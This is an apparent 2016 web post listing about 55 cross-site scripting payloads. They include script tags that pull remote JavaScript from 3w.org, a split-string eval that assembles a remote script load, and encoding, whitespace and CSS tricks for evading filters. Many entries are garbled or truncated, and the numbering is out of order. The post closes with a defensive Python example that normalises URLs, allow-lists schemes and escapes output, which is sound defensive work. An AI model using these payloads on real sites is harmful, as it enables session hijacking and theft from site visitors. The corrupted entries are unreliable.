XSS Attack Summary

Posted on 2016-4-28 10:06:15
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative pop-up dialogs
<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag without semicolons or quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab, splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection, an extreme XSS example
<IMG SRC=\'#\'" /span>

(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically ineffective domestically, because there is nowhere they can be used
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the IMG tag
<IMG SRC=\'#\'"   javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping filtered JavaScript
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC=\'#\'" /span>

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters added (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE (made up of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed Flash that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>

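Most of the URL-attribute variants above (items 4, 5, 8 to 15, 17, 19 and 47) beat the same weak defence: a filter that searches the raw input for the literal string javascript: before the browser has decoded character references and thrown away the tab, newline, carriage-return, NUL and whitespace characters it tolerates inside a scheme. The Python below is an added example for the defender's side and is not code from the original post: it normalises an attribute value the way a browser would, then allow-lists the scheme instead of deny-listing strings, and escapes untrusted text on output for the HTML context. The sample values are constructed from the page's own patterns, example.com is a placeholder host, and the non-ASCII whitespace set is my reading of the character list in item (47) (an assumption; tune it for the browsers you support).

```python
import html
import re
from urllib.parse import urlsplit

# Characters browsers discard before or inside a URL scheme: ASCII controls,
# space and DEL, plus the non-ASCII whitespace from item (47) as read here
# (assumption: U+00A0, U+2000-U+200B, U+3000, U+FEFF).
_IGNORED_CHARS = re.compile(r"[\x00-\x20\x7f\xa0\u2000-\u200b\u3000\ufeff]")

# Only these schemes may be written into href/src-style attributes.
ALLOWED_SCHEMES = {"http", "https"}

# Constructed sample attribute values mirroring the tricks in the list above.
SAMPLE_URLS = {
    "plain": "javascript:alert('XSS')",                                # item (3)
    "mixed_case": "JaVaScRiPt:alert('XSS')",                           # item (4)
    "decimal_entities": "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",   # (5)
    "hex_entities_no_semicolon": "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('XSS')",  # (10)
    "embedded_tab": "jav\tascript:alert('XSS')",                       # item (11)
    "encoded_tab": "jav&#x09;ascript:alert('XSS')",                    # item (12)
    "embedded_newline": "jav\nascript:alert('XSS')",                   # item (13)
    "embedded_cr": "jav\rascript:alert('XSS')",                        # item (14)
    "null_byte": "java\0script:alert('XSS')",                          # item (17)
    "leading_whitespace": " \t javascript:alert('XSS')",               # item (19)
    "nbsp_prefix": "\xa0javascript:alert('XSS')",                      # item (47)
    "https_ok": "https://example.com/page?x=1",                        # placeholder host
    "relative_ok": "/images/logo.png",
}


def normalize_url(value: str) -> str:
    """Undo the decoding a browser applies before it inspects the scheme.

    1. Decode HTML character references; html.unescape also accepts numeric
       references without a trailing ';', which is what item (10) relies on.
    2. Drop the control/whitespace characters browsers ignore. This runs after
       decoding because a reference such as &#x09; only becomes a tab once decoded.
    """
    decoded = html.unescape(value)
    return _IGNORED_CHARS.sub("", decoded)


def url_scheme(value: str) -> str:
    """Lower-cased scheme of the normalized value, or '' for a relative URL."""
    return urlsplit(normalize_url(value)).scheme.lower()


def is_safe_url(value: str) -> bool:
    """Allow-list check: relative URLs or http(s) only.

    A scheme check says nothing about the host, so a protocol-relative value
    like //3w.org/XSS/xss.js (item 25) passes here; add a host allow-list if
    the attribute must also stay on your own origin.
    """
    scheme = url_scheme(value)
    return scheme == "" or scheme in ALLOWED_SCHEMES


def escape_for_html(text: str) -> str:
    """Output encoding for text and quoted-attribute contexts (items 1, 23, 30).

    Escaping on output, rather than stripping '<script>' from input, also
    covers the nested <<SCRIPT> form and the unclosed-tag forms (24) to (27).
    """
    return html.escape(text, quote=True)


def classify_samples() -> dict:
    """Run the allow-list check over every constructed sample value."""
    return {name: is_safe_url(value) for name, value in SAMPLE_URLS.items()}


if __name__ == "__main__":
    for name, verdict in classify_samples().items():
        print(f"{name:28s} scheme={url_scheme(SAMPLE_URLS[name])!r:14} safe={verdict}")
    print(escape_for_html('<<SCRIPT>alert("XSS");//<</SCRIPT>'))
```

The point of the normalise-then-allow-list order is that every variant in the list collapses to the same scheme string once the browser's own decoding is replayed, so the check has nothing left to miss; a deny-list that inspects the raw bytes has to enumerate each encoding separately and loses as soon as a new one appears.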